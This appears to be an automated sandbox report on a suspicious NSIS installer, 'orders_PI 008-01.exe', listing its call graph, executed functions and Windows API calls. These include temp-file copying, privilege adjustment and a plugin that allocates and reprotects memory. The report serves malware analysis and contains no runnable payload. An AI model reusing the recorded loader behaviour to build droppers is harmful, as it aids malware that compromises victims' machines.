CharPrevW 2743->2911 2746 4059a2 2 API calls 2747 403495 2746->2747 2914 405f13 2747->2914 2918 405ee4 GetFileAttributesW CreateFileW 2750->2918 2752 403055 2770 403065 2752->2770 2919 4063ee lstrcpynW 2752->2919 2754 40307b 2920 405d0f lstrlenW 2754->2920 2758 40308c GetFileSize 2759 403186 2758->2759 2772 4030a3 2758->2772 2925 402fb1 2759->2925 2761 40318f 2763 4031bf GlobalAlloc 2761->2763 2761->2770 2960 40345a SetFilePointer 2761->2960 2936 40345a SetFilePointer 2763->2936 2765 4031f2 2767 402fb1 6 API calls 2765->2767 2767->2770 2768 4031a8 2771 403444 ReadFile 2768->2771 2769 4031da 2937 40324c 2769->2937 2770->2665 2774 4031b3 2771->2774 2772->2759 2772->2765 2772->2770 2775 402fb1 6 API calls 2772->2775 2957 403444 2772->2957 2774->2763 2774->2770 2775->2772 2776 4031e6 2776->2770 2776->2776 2777 403223 SetFilePointer 2776->2777 2777->2770 2779 4067e3 5 API calls 2778->2779 2780 403ad1 2779->2780 2781 403ad7 2780->2781 2782 403ae9 2780->2782 2989 406335 wsprintfW 2781->2989 2990 4062bc 2782->2990 2785 403b38 lstrcatW 2788 403ae7 2785->2788 2787 4062bc 3 API calls 2787->2785 2981 403d93 2788->2981 2791 405dcb 18 API calls 2793 403b6a 2791->2793 2792 403bfe 2794 405dcb 18 API calls 2792->2794 2793->2792 2795 4062bc 3 API calls 2793->2795 2796 403c04 2794->2796 2797 403b9c 2795->2797 2798 403c14 LoadImageW 2796->2798 2799 40642b 17 API calls 2796->2799 2797->2792 2804 403bbd lstrlenW 2797->2804 2805 405cf0 CharNextW 2797->2805 2800 403cba 2798->2800 2801 403c3b RegisterClassW 2798->2801 2799->2798 2803 40140b 2 API calls 2800->2803 2802 403c71 SystemParametersInfoW CreateWindowExW 2801->2802 2833 403cc4 2801->2833 2802->2800 2808 403cc0 2803->2808 2806 403bf1 2804->2806 2807 403bcb lstrcmpiW 2804->2807 2809 403bba 2805->2809 2811 405cc3 3 API calls 2806->2811 2807->2806 2810 403bdb GetFileAttributesW 2807->2810 2813 403d93 18 API calls 2808->2813 2808->2833 2809->2804 2812 403be7 2810->2812 2814 403bf7 2811->2814 2812->2806 2815 405d0f 2 API calls 2812->2815 2816 403cd1 2813->2816 2995 4063ee lstrcpynW 2814->2995 2815->2806 2818 403d60 2816->2818 2819 403cdd ShowWindow 2816->2819 2996 405529 OleInitialize 2818->2996 2821 406773 3 API calls 2819->2821 2823 403cf5 2821->2823 2822 403d66 2824 403d82 2822->2824 2825 403d6a 2822->2825 2826 403d03 GetClassInfoW 2823->2826 2830 406773 3 API calls 2823->2830 2829 40140b 2 API calls 2824->2829 2832 40140b 2 API calls 2825->2832 2825->2833 2827 403d17 GetClassInfoW RegisterClassW 2826->2827 2828 403d2d DialogBoxParamW 2826->2828 2827->2828 2831 40140b 2 API calls 2828->2831 2829->2833 2830->2826 2831->2833 2832->2833 2833->2676 2835 4067e3 5 API calls 2834->2835 2836 403842 lstrcatW 2835->2836 2836->2695 2836->2696 2838 403884 2837->2838 2839 405976 GetLastError 2837->2839 2838->2710 2839->2838 2840 405985 SetFileSecurityW 2839->2840 2840->2838 2841 40599b GetLastError 2840->2841 2841->2838 2842->2722 2855 406438 2843->2855 2844 406683 2845 4038e5 DeleteFileW 2844->2845 3020 4063ee lstrcpynW 2844->3020 2845->2717 2845->2722 2847 406651 lstrlenW 2847->2855 2850 40642b 10 API calls 2850->2847 2851 406566 GetSystemDirectoryW 2851->2855 2852 4062bc 3 API calls 2852->2855 2853 406579 GetWindowsDirectoryW 2853->2855 2854 40669d 5 API calls 2854->2855 2855->2844 2855->2847 2855->2850 2855->2851 2855->2852 2855->2853 2855->2854 2856 4065ad SHGetSpecialFolderLocation 2855->2856 2857 40642b 10 API calls 2855->2857 2858 4065f4 lstrcatW 2855->2858 3018 406335 wsprintfW 2855->3018 3019 4063ee lstrcpynW 2855->3019 2856->2855 2859 4065c5 SHGetPathFromIDListW CoTaskMemFree 2856->2859 2857->2855 2858->2855 2859->2855 2861 4061d5 2860->2861 2862 4061c8 2860->2862 2861->2722 3021 40603a 2862->3021 2865 405a16 2864->2865 2866 405a0a CloseHandle 2864->2866 2865->2722 2866->2865 2867->2671 3055 4063ee lstrcpynW 2868->3055 2870 405ddc 3056 405d6e CharNextW CharNextW 2870->3056 2873 4037e3 2873->2676 2882 4063ee lstrcpynW 2873->2882 2874 40669d 5 API calls 2880 405df2 2874->2880 2875 405e23 lstrlenW 2876 405e2e 2875->2876 2875->2880 2877 405cc3 3 API calls 2876->2877 2879 405e33 GetFileAttributesW 2877->2879 2879->2873 2880->2873 2880->2875 2881 405d0f 2 API calls 2880->2881 3062 40674c FindFirstFileW 2880->3062 2881->2875 2882->2701 2883->2708 2885 4039fb 2884->2885 2886 4039ed CloseHandle 2884->2886 3065 403a28 2885->3065 2886->2885 2892 405a69 2891->2892 2893 403835 ExitProcess 2892->2893 2894 405a7d MessageBoxIndirectW 2892->2894 2894->2893 2896 4059b2 2895->2896 2897 4059b6 GetLastError 2895->2897 2896->2710 2897->2896 2898->2711 2900 401389 2 API calls 2899->2900 2901 401420 2900->2901 2901->2680 2909 4066aa 2902->2909 2903 406720 2904 406725 CharPrevW 2903->2904 2907 406746 2903->2907 2904->2903 2905 406713 CharNextW 2905->2903 2905->2909 2906 405cf0 CharNextW 2906->2909 2907->2743 2908 4066ff CharNextW 2908->2909 2909->2903 2909->2905 2909->2906 2909->2908 2910 40670e CharNextW 2909->2910 2910->2905 2912 40348f 2911->2912 2913 405cdf lstrcatW 2911->2913 2912->2746 2913->2912 2915 405f20 GetTickCount GetTempFileNameW 2914->2915 2916 4034a0 2915->2916 2917 405f56 2915->2917 2916->2657 2917->2915 2917->2916 2918->2752 2919->2754 2921 405d1d 2920->2921 2922 405d23 CharPrevW 2921->2922 2923 403081 2921->2923 2922->2921 2922->2923 2924 4063ee lstrcpynW 2923->2924 2924->2758 2926 402fd2 2925->2926 2927 402fba 2925->2927 2930 402fe2 GetTickCount 2926->2930 2931 402fda 2926->2931 2928 402fc3 DestroyWindow 2927->2928 2929 402fca 2927->2929 2928->2929 2929->2761 2933 402ff0 CreateDialogParamW ShowWindow 2930->2933 2934 403013 2930->2934 2961 40681f 2931->2961 2933->2934 2934->2761 2936->2769 2939 403265 2937->2939 2938 403293 2941 403444 ReadFile 2938->2941 2939->2938 2978 40345a SetFilePointer 2939->2978 2942 40329e 2941->2942 2943 4032b0 GetTickCount 2942->2943 2944 4033dd 2942->2944 2946 4033c7 2942->2946 2943->2946 2953 4032dc 2943->2953 2945 40341f 2944->2945 2950 4033e1 2944->2950 2947 403444 ReadFile 2945->2947 2946->2776 2947->2946 2948 403444 ReadFile 2948->2953 2949 403444 ReadFile 2949->2950 2950->2946 2950->2949 2951 405f96 WriteFile 2950->2951 2951->2950 2952 403332 GetTickCount 2952->2953 2953->2946 2953->2948 2953->2952 2954 403357 MulDiv wsprintfW 2953->2954 2976 405f96 WriteFile 2953->2976 2965 405456 2954->2965 2979 405f67 ReadFile 2957->2979 2960->2768 2962 40683c PeekMessageW 2961->2962 2963 406832 DispatchMessageW 2962->2963 2964 402fe0 2962->2964 2963->2962 2964->2761 2966 405471 2965->2966 2974 405513 2965->2974 2967 40548d lstrlenW 2966->2967 2968 40642b 17 API calls 2966->2968 2969 4054b6 2967->2969 2970 40549b lstrlenW 2967->2970 2968->2967 2971 4054c9 2969->2971 2972 4054bc SetWindowTextW 2969->2972 2973 4054ad lstrcatW 2970->2973 2970->2974 2971->2974 2975 4054cf SendMessageW SendMessageW SendMessageW 2971->2975 2972->2971 2973->2969 2974->2953 2975->2974 2977 405fb4 2976->2977 2977->2953 2978->2938 2980 403457 2979->2980 2980->2772 2982 403da7 2981->2982 3003 406335 wsprintfW 2982->3003 2984 403e18 3004 403e4c 2984->3004 2986 403b48 2986->2791 2987 403e1d 2987->2986 2988 40642b 17 API calls 2987->2988 2988->2987 2989->2788 3007 40625b 2990->3007 2993 4062f0 RegQueryValueExW RegCloseKey 2994 403b19 2993->2994 2994->2785 2994->2787 2995->2792 3011 404390 2996->3011 2998 40554c 3002 405573 2998->3002 3014 401389 2998->3014 2999 404390 SendMessageW 3000 405585 OleUninitialize 2999->3000 3000->2822 3002->2999 3003->2984 3005 40642b 17 API calls 3004->3005 3006 403e5a SetWindowTextW 3005->3006 3006->2987 3008 40626a 3007->3008 3009 406273 RegOpenKeyExW 3008->3009 3010 40626e 3008->3010 3009->3010 3010->2993 3010->2994 3012 4043a8 3011->3012 3013 404399 SendMessageW 3011->3013 3012->2998 3013->3012 3016 401390 3014->3016 3015 4013fe 3015->2998 3016->3015 3017 4013cb MulDiv SendMessageW 3016->3017 3017->3016 3018->2855 3019->2855 3020->2845 3022 406090 GetShortPathNameW 3021->3022 3023 40606a 3021->3023 3025 4060a5 3022->3025 3026 4061af 3022->3026 3048 405ee4 GetFileAttributesW CreateFileW 3023->3048 3025->3026 3028 4060ad wsprintfA 3025->3028 3026->2861 3027 406074 CloseHandle GetShortPathNameW 3027->3026 3029 406088 3027->3029 3030 40642b 17 API calls 3028->3030 3029->3022 3029->3026 3031 4060d5 3030->3031 3049 405ee4 GetFileAttributesW CreateFileW 3031->3049 3033 4060e2 3033->3026 3034 4060f1 GetFileSize GlobalAlloc 3033->3034 3035 406113 3034->3035 3036 4061a8 CloseHandle 3034->3036 3037 405f67 ReadFile 3035->3037 3036->3026 3038 40611b 3037->3038 3038->3036 3050 405e49 lstrlenA 3038->3050 3041 406132 lstrcpyA 3044 406154 3041->3044 3042 406146 3043 405e49 4 API calls 3042->3043 3043->3044 3045 40618b SetFilePointer 3044->3045 3046 405f96 WriteFile 3045->3046 3047 4061a1 GlobalFree 3046->3047 3047->3036 3048->3027 3049->3033 3051 405e8a lstrlenA 3050->3051 3052 405e92 3051->3052 3053 405e63 lstrcmpiA 3051->3053 3052->3041 3052->3042 3053->3052 3054 405e81 CharNextA 3053->3054 3054->3051 3055->2870 3057 405d8b 3056->3057 3059 405d9d 3056->3059 3057->3059 3060 405d98 CharNextW 3057->3060 3058 405dc1 3058->2873 3058->2874 3059->3058 3061 405cf0 CharNextW 3059->3061 3060->3058 3061->3059 3063 406762 FindClose 3062->3063 3064 40676d 3062->3064 3063->3064 3064->2880 3066 403a36 3065->3066 3067 403a00 3066->3067 3068 403a3b FreeLibrary GlobalFree 3066->3068 3069 405b00 3067->3069 3068->3067 3068->3068 3070 405dcb 18 API calls 3069->3070 3071 405b20 3070->3071 3072 405b28 DeleteFileW 3071->3072 3073 405b3f 3071->3073 3074 403816 OleUninitialize 3072->3074 3075 405c5f 3073->3075 3108 4063ee lstrcpynW 3073->3108 3074->2677 3074->2678 3075->3074 3081 40674c 2 API calls 3075->3081 3077 405b65 3078 405b78 3077->3078 3079 405b6b lstrcatW 3077->3079 3080 405d0f 2 API calls 3078->3080 3082 405b7e 3079->3082 3080->3082 3084 405c84 3081->3084 3083 405b8e lstrcatW 3082->3083 3085 405b99 lstrlenW FindFirstFileW 3082->3085 3083->3085 3084->3074 3086 405c88 3084->3086 3085->3075 3093 405bbb 3085->3093 3087 405cc3 3 API calls 3086->3087 3088 405c8e 3087->3088 3090 405ab8 5 API calls 3088->3090 3089 405c42 FindNextFileW 3089->3093 3094 405c58 FindClose 3089->3094 3092 405c9a 3090->3092 3095 405cb4 3092->3095 3096 405c9e 3092->3096 3093->3089 3100 405b00 60 API calls 3093->3100 3102 405c0c 3093->3102 3109 4063ee lstrcpynW 3093->3109 3094->3075 3098 405456 24 API calls 3095->3098 3096->3074 3099 405456 24 API calls 3096->3099 3098->3074 3101 405cab 3099->3101 3100->3102 3104 4061b4 36 API calls 3101->3104 3102->3089 3103 405456 24 API calls 3102->3103 3106 405456 24 API calls 3102->3106 3107 4061b4 36 API calls 3102->3107 3110 405ab8 3102->3110 3103->3089 3105 405cb2 3104->3105 3105->3074 3106->3102 3107->3102 3108->3077 3109->3093 3118 405ebf GetFileAttributesW 3110->3118 3113 405ad3 RemoveDirectoryW 3116 405ae1 3113->3116 3114 405adb DeleteFileW 3114->3116 3115 405ae5 3115->3102 3116->3115 3117 405af1 SetFileAttributesW 3116->3117 3117->3115 3119 405ed1 SetFileAttributesW 3118->3119 3120 405ac4 3118->3120 3119->3120 3120->3113 3120->3114 3120->3115 3121 6ff41777 3122 6ff417aa 3121->3122 3163 6ff41b5f 3122->3163 3124 6ff417b1 3125 6ff418d6 3124->3125 3126 6ff417c2 3124->3126 3127 6ff417c9 3124->3127 3213 6ff4239e 3126->3213 3197 6ff423e0 3127->3197 3132 6ff4182d 3138 6ff41833 3132->3138 3139 6ff4187e 3132->3139 3133 6ff4180f 3226 6ff425b5 3133->3226 3134 6ff417df 3137 6ff417e5 3134->3137 3143 6ff417f0 3134->3143 3135 6ff417f8 3148 6ff417ee 3135->3148 3223 6ff42d83 3135->3223 3137->3148 3207 6ff42af8 3137->3207 3245 6ff415c6 3138->3245 3141 6ff425b5 10 API calls 3139->3141 3146 6ff4186f 3141->3146 3142 6ff41815 3237 6ff415b4 3142->3237 3217 6ff42770 3143->3217 3162 6ff418c5 3146->3162 3251 6ff42578 3146->3251 3148->3132 3148->3133 3152 6ff417f6 3152->3148 3153 6ff425b5 10 API calls 3153->3146 3155 6ff418cf GlobalFree 3155->3125 3159 6ff418b1 3159->3162 3255 6ff4153d wsprintfW 3159->3255 3160 6ff418aa FreeLibrary 3160->3159 3162->3125 3162->3155 3258 6ff4121b GlobalAlloc 3163->3258 3165 6ff41b86 3259 6ff4121b GlobalAlloc 3165->3259 3167 6ff41dcb GlobalFree GlobalFree GlobalFree 3168 6ff41de8 3167->3168 3179 6ff41e32 3167->3179 3170 6ff421de 3168->3170 3178 6ff41dfd 3168->3178 3168->3179 3169 6ff41c86 GlobalAlloc 3190 6ff41b91 3169->3190 3171 6ff42200 GetModuleHandleW 3170->3171 3170->3179 3172 6ff42226 3171->3172 3173 6ff42211 LoadLibraryW 3171->3173 3266 6ff4161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 3172->3266 3173->3172 3173->3179 3174 6ff41cd1 lstrcpyW 3177 6ff41cdb lstrcpyW 3174->3177 3175 6ff41cef GlobalFree 3175->3190 3177->3190 3178->3179 3262 6ff4122c 3178->3262 3179->3124 3180 6ff42278 3180->3179 3183 6ff42285 lstrlenW 3180->3183 3181 6ff42086 3265 6ff4121b GlobalAlloc 3181->3265 3267 6ff4161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 3183->3267 3185 6ff41fc7 GlobalFree 3185->3190 3186 6ff4210e 3186->3179 3194 6ff42176 lstrcpyW 3186->3194 3187 6ff42238 3187->3180 3195 6ff42262 GetProcAddress 3187->3195 3189 6ff41d2d 3189->3190 3260 6ff4158f GlobalSize GlobalAlloc 3189->3260 3190->3167 3190->3169 3190->3174 3190->3175 3190->3177 3190->3179 3190->3181 3190->3185 3190->3186 3190->3189 3192 6ff4122c 2 API calls 3190->3192 3191 6ff4229f 3191->3179 3192->3190 3194->3179 3195->3180 3196 6ff4208f 3196->3124 3199 6ff423f8 3197->3199 3198 6ff4122c GlobalAlloc lstrcpynW 3198->3199 3199->3198 3201 6ff42521 GlobalFree 3199->3201 3203 6ff424a0 GlobalAlloc WideCharToMultiByte 3199->3203 3204 6ff424cb GlobalAlloc CLSIDFromString 3199->3204 3206 6ff424ea 3199->3206 3269 6ff412ba 3199->3269 3201->3199 3202 6ff417cf 3201->3202 3202->3134 3202->3135 3202->3148 3203->3201 3204->3201 3206->3201 3273 6ff42704 3206->3273 3209 6ff42b0a 3207->3209 3208 6ff42baf VirtualAlloc 3212 6ff42bcd 3208->3212 3209->3208 3211 6ff42c99 3211->3148 3276 6ff42aa2 3212->3276 3214 6ff423b3 3213->3214 3215 6ff423be GlobalAlloc 3214->3215 3216 6ff417c8 3214->3216 3215->3214 3216->3127 3221 6ff427a0 3217->3221 3218 6ff4284e 3220 6ff42854 GlobalSize 3218->3220 3222 6ff4285e 3218->3222 3219 6ff4283b GlobalAlloc 3219->3222 3220->3222 3221->3218 3221->3219 3222->3152 3224 6ff42d8e 3223->3224 3225 6ff42dce GlobalFree 3224->3225 3280 6ff4121b GlobalAlloc 3226->3280 3228 6ff42638 MultiByteToWideChar 3233 6ff425bf 3228->3233 3229 6ff4265a StringFromGUID2 3229->3233 3230 6ff4266b lstrcpynW 3230->3233 3231 6ff4267e wsprintfW 3231->3233 3232 6ff426a2 GlobalFree 3232->3233 3233->3228 3233->3229 3233->3230 3233->3231 3233->3232 3234 6ff426d7 GlobalFree 3233->3234 3235 6ff41272 2 API calls 3233->3235 3281 6ff412e1 3233->3281 3234->3142 3235->3233 3285 6ff4121b GlobalAlloc 3237->3285 3239 6ff415b9 3240 6ff415c6 2 API calls 3239->3240 3241 6ff415c3 3240->3241 3242 6ff41272 3241->3242 3243 6ff412b5 GlobalFree 3242->3243 3244 6ff4127b GlobalAlloc lstrcpynW 3242->3244 3243->3146 3244->3243 3246 6ff415d2 wsprintfW 3245->3246 3247 6ff415ff lstrcpyW 3245->3247 3250 6ff41618 3246->3250 3247->3250 3250->3153 3252 6ff41891 3251->3252 3253 6ff42586 3251->3253 3252->3159 3252->3160 3253->3252 3254 6ff425a2 GlobalFree 3253->3254 3254->3253 3256 6ff41272 2 API calls 3255->3256 3257 6ff4155e 3256->3257 3257->3162 3258->3165 3259->3190 3261 6ff415ad 3260->3261 3261->3189 3268 6ff4121b GlobalAlloc 3262->3268 3264 6ff4123b lstrcpynW 3264->3179 3265->3196 3266->3187 3267->3191 3268->3264 3270 6ff412c1 3269->3270 3271 6ff4122c 2 API calls 3270->3271 3272 6ff412df 3271->3272 3272->3199 3274 6ff42712 VirtualAlloc 3273->3274 3275 6ff42768 3273->3275 3274->3275 3275->3206 3277 6ff42aad 3276->3277 3278 6ff42ab2 GetLastError 3277->3278 3279 6ff42abd 3277->3279 3278->3279 3279->3211 3280->3233 3282 6ff4130c 3281->3282 3283 6ff412ea 3281->3283 3282->3233 3283->3282 3284 6ff412f0 lstrcpyW 3283->3284 3284->3282 3285->3239 3459 6ff4103d 3462 6ff4101b 3459->3462 3463 6ff41516 GlobalFree 3462->3463 3464 6ff41020 3463->3464 3465 6ff41024 3464->3465 3466 6ff41027 GlobalAlloc 3464->3466 3467 6ff4153d 3 API calls 3465->3467 3466->3465 3468 6ff4103b 3467->3468 3286 403e6b 3287 403e83 3286->3287 3288 403fbe 3286->3288 3287->3288 3291 403e8f 3287->3291 3289 40400f 3288->3289 3290 403fcf GetDlgItem GetDlgItem 3288->3290 3293 404069 3289->3293 3303 401389 2 API calls 3289->3303 3292 404344 18 API calls 3290->3292 3294 403e9a SetWindowPos 3291->3294 3295 403ead 3291->3295 3298 403ff9 SetClassLongW 3292->3298 3299 404390 SendMessageW 3293->3299 3319 403fb9 3293->3319 3294->3295 3296 403eb2 ShowWindow 3295->3296 3297 403eca 3295->3297 3296->3297 3300 403ed2 DestroyWindow 3297->3300 3301 403eec 3297->3301 3302 40140b 2 API calls 3298->3302 3313 40407b 3299->3313 3356 4042cd 3300->3356 3304 403ef1 SetWindowLongW 3301->3304 3305 403f02 3301->3305 3302->3289 3306 404041 3303->3306 3304->3319 3309 403fab 3305->3309 3310 403f0e GetDlgItem 3305->3310 3306->3293 3311 404045 SendMessageW 3306->3311 3307 40140b 2 API calls 3307->3313 3308 4042cf DestroyWindow EndDialog 3308->3356 3366 4043ab 3309->3366 3314 403f21 SendMessageW IsWindowEnabled 3310->3314 3315 403f3e 3310->3315 3311->3319 3312 4042fe ShowWindow 3312->3319 3313->3307 3313->3308 3317 40642b 17 API calls 3313->3317 3313->3319 3329 404344 18 API calls 3313->3329 3347 40420f DestroyWindow 3313->3347 3357 404344 3313->3357 3314->3315 3314->3319 3318 403f43 3315->3318 3320 403f4b 3315->3320 3322 403f92 SendMessageW 3315->3322 3323 403f5e 3315->3323 3317->3313 3363 40431d 3318->3363 3320->3318 3320->3322 3322->3309 3324 403f66 3323->3324 3325 403f7b 3323->3325 3327 40140b 2 API calls 3324->3327 3328 40140b 2 API calls 3325->3328 3326 403f79 3326->3309 3327->3318 3330 403f82 3328->3330 3329->3313 3330->3309 3330->3318 3332 4040f6 GetDlgItem 3333 404113 ShowWindow KiUserCallbackDispatcher 3332->3333 3334 40410b 3332->3334 3360 404366 KiUserCallbackDispatcher 3333->3360 3334->3333 3336 40413d EnableWindow 3341 404151 3336->3341 3337 404156 GetSystemMenu EnableMenuItem SendMessageW 3338 404186 SendMessageW 3337->3338 3337->3341 3338->3341 3340 403e4c 18 API calls 3340->3341 3341->3337 3341->3340 3361 404379 SendMessageW 3341->3361 3362 4063ee lstrcpynW 3341->3362 3343 4041b5 lstrlenW 3344 40642b 17 API calls 3343->3344 3345 4041cb SetWindowTextW 3344->3345 3346 401389 2 API calls 3345->3346 3346->3313 3348 404229 CreateDialogParamW 3347->3348 3347->3356 3349 40425c 3348->3349 3348->3356 3350 404344 18 API calls 3349->3350 3351 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3350->3351 3352 401389 2 API calls 3351->3352 3353 4042ad 3352->3353 3353->3319 3354 4042b5 ShowWindow 3353->3354 3355 404390 SendMessageW 3354->3355 3355->3356 3356->3312 3356->3319 3358 40642b 17 API calls 3357->3358 3359 40434f SetDlgItemTextW 3358->3359 3359->3332 3360->3336 3361->3341 3362->3343 3364 404324 3363->3364 3365 40432a SendMessageW 3363->3365 3364->3365 3365->3326 3367 40446e 3366->3367 3368 4043c3 GetWindowLongW 3366->3368 3367->3319 3368->3367 3369 4043d8 3368->3369 3369->3367 3370 404405 GetSysColor 3369->3370 3371 404408 3369->3371 3370->3371 3372 404418 SetBkMode 3371->3372 3373 40440e SetTextColor 3371->3373 3374 404430 GetSysColor 3372->3374 3375 404436 3372->3375 3373->3372 3374->3375 3376 404447 3375->3376 3377 40443d SetBkColor 3375->3377 3376->3367 3378 404461 CreateBrushIndirect 3376->3378 3379 40445a DeleteObject 3376->3379 3377->3376 3378->3367 3379->3378 3380 6ff429df 3381 6ff42a2f 3380->3381 3382 6ff429ef VirtualProtect 3380->3382 3382->3381 3431 402f2b 3432 402f3d SetTimer 3431->3432 3435 402f56 3431->3435 3432->3435 3433 402fab 3434 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3434->3433 3435->3433 3435->3434 3446 6ff41058 3448 6ff41074 3446->3448 3447 6ff410dd 3448->3447 3449 6ff41092 3448->3449 3450 6ff41516 GlobalFree 3448->3450 3451 6ff41516 GlobalFree 3449->3451 3450->3449 3452 6ff410a2 3451->3452 3453 6ff410b2 3452->3453 3454 6ff410a9 GlobalSize 3452->3454 3455 6ff410b6 GlobalAlloc 3453->3455 3456 6ff410c7 3453->3456 3454->3453 3457 6ff4153d 3 API calls 3455->3457 3458 6ff410d2 GlobalFree 3456->3458 3457->3456 3458->3447 3421 6ff418d9 3422 6ff418fc 3421->3422 3423 6ff41931 GlobalFree 3422->3423 3424 6ff41943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 3422->3424 3423->3424 3425 6ff41272 2 API calls 3424->3425 3426 6ff41ace GlobalFree GlobalFree 3425->3426 3469 6ff41000 3470 6ff4101b 5 API calls 3469->3470 3471 6ff41019 3470->3471 3387 6ff410e1 3388 6ff41111 3387->3388 3389 6ff411d8 GlobalFree 3388->3389 3390 6ff412ba 2 API calls 3388->3390 3391 6ff411d3 3388->3391 3392 6ff41164 GlobalAlloc 3388->3392 3393 6ff411f8 GlobalFree 3388->3393 3394 6ff41272 2 API calls 3388->3394 3395 6ff411c4 GlobalFree 3388->3395 3396 6ff412e1 lstrcpyW 3388->3396 3390->3388 3391->3389 3392->3388 3393->3388 3394->3395 3395->3388 3396->3388 3427 6ff42ca3 3428 6ff42cbb 3427->3428 3429 6ff4158f 2 API calls 3428->3429 3430 6ff42cd6 3429->3430 3436 6ff4166d 3442 6ff41516 3436->3442 3438 6ff416cb GlobalFree 3439 6ff41685 3439->3438 3440 6ff416a0 3439->3440 3441 6ff416b7 VirtualFree 3439->3441 3440->3438 3441->3438 3443 6ff4151c 3442->3443 3444 6ff41522 3443->3444 3445 6ff4152e GlobalFree 3443->3445 3444->3439 3445->3439 3383 6ff42349 3384 6ff423b3 3383->3384 3385 6ff423be GlobalAlloc 3384->3385 3386 6ff423dd 3384->3386 3385->3384

                                        Executed Functions

                                        Function 004034A2 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4034a2-4034df SetErrorMode GetVersion 1 4034e1-4034e9 call 4067e3 0->1 2 4034f2 0->2 1->2 7 4034eb 1->7 4 4034f7-40350b call 406773 lstrlenA 2->4 9 40350d-403529 call 4067e3 * 3 4->9 7->2 16 40353a-403599 #17 OleInitialize SHGetFileInfoW call 4063ee GetCommandLineW call 4063ee 9->16 17 40352b-403531 9->17 24 4035a3-4035bd call 405cf0 CharNextW 16->24 25 40359b-4035a2 16->25 17->16 21 403533 17->21 21->16 28 4035c3-4035c9 24->28 29 4036d4-4036ee GetTempPathW call 403471 24->29 25->24 30 4035d2-4035d6 28->30 31 4035cb-4035d0 28->31 38 4036f0-40370e GetWindowsDirectoryW lstrcatW call 403471 29->38 39 403746-403760 DeleteFileW call 403015 29->39 33 4035d8-4035dc 30->33 34 4035dd-4035e1 30->34 31->30 31->31 33->34 36 4036a0-4036ad call 405cf0 34->36 37 4035e7-4035ed 34->37 54 4036b1-4036b7 36->54 55 4036af-4036b0 36->55 42 403608-403641 37->42 43 4035ef-4035f7 37->43 38->39 52 403710-403740 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403471 38->52 56 403811-403821 call 4039e3 OleUninitialize 39->56 57 403766-40376c 39->57 50 403643-403648 42->50 51 40365e-403698 42->51 48 4035f9-4035fc 43->48 49 4035fe 43->49 48->42 48->49 49->42 50->51 58 40364a-403652 50->58 51->36 53 40369a-40369e 51->53 52->39 52->56 53->36 60 4036bf-4036cd call 4063ee 53->60 54->28 61 4036bd 54->61 55->54 75 403947-40394d 56->75 76 403827-403837 call 405a54 ExitProcess 56->76 62 403801-403808 call 403abd 57->62 63 403772-40377d call 405cf0 57->63 65 403654-403657 58->65 66 403659 58->66 68 4036d2 60->68 61->68 74 40380d 62->74 80 4037cb-4037d5 63->80 81 40377f-4037b4 63->81 65->51 65->66 66->51 68->29 74->56 78 4039cb-4039d3 75->78 79 40394f-403965 GetCurrentProcess OpenProcessToken 75->79 82 4039d5 78->82 83 4039d9-4039dd ExitProcess 78->83 87 403967-403995 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 40399b-4039a9 call 4067e3 79->88 85 4037d7-4037e5 call 405dcb 80->85 86 40383d-403851 call 4059bf lstrcatW 80->86 89 4037b6-4037ba 81->89 82->83 85->56 99 4037e7-4037fd call 4063ee * 2 85->99 100 403853-403859 lstrcatW 86->100 101 40385e-403878 lstrcatW lstrcmpiW 86->101 87->88 102 4039b7-4039c2 ExitWindowsEx 88->102 103 4039ab-4039b5 88->103 93 4037c3-4037c7 89->93 94 4037bc-4037c1 89->94 93->89 98 4037c9 93->98 94->93 94->98 98->80 99->62 100->101 101->56 105 40387a-40387d 101->105 102->78 106 4039c4-4039c6 call 40140b 102->106 103->102 103->106 108 403886 call 4059a2 105->108 109 40387f call 405925 105->109 106->78 117 40388b-403899 SetCurrentDirectoryW 108->117 116 403884 109->116 116->117 118 4038a6-4038cf call 4063ee 117->118 119 40389b-4038a1 call 4063ee 117->119 123 4038d4-4038f0 call 40642b DeleteFileW 118->123 119->118 126 403931-403939 123->126 127 4038f2-403902 CopyFileW 123->127 126->123 128 40393b-403942 call 4061b4 126->128 127->126 129 403904-40391d call 4061b4 call 40642b call 4059d7 127->129 128->56 137 403922-403924 129->137 137->126 138 403926-40392d CloseHandle 137->138 138->126
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 004034C5
                                        • GetVersion.KERNEL32 ref: 004034CB
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                        • #17.COMCTL32(?,?,?,?), ref: 0040353B
                                        • OleInitialize.OLE32(00000000), ref: 00403542
                                        • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                        • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,?,?,?), ref: 00403573
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\orders_PI 008-01.exe",?,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?), ref: 004035AB
                                          • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,?,?,00403514,?), ref: 004067F5
                                          • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,?,?,?), ref: 004036E5
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,?,?), ref: 004036F6
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,?,?,?), ref: 00403702
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,?,?), ref: 00403716
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,?,?,?), ref: 0040371E
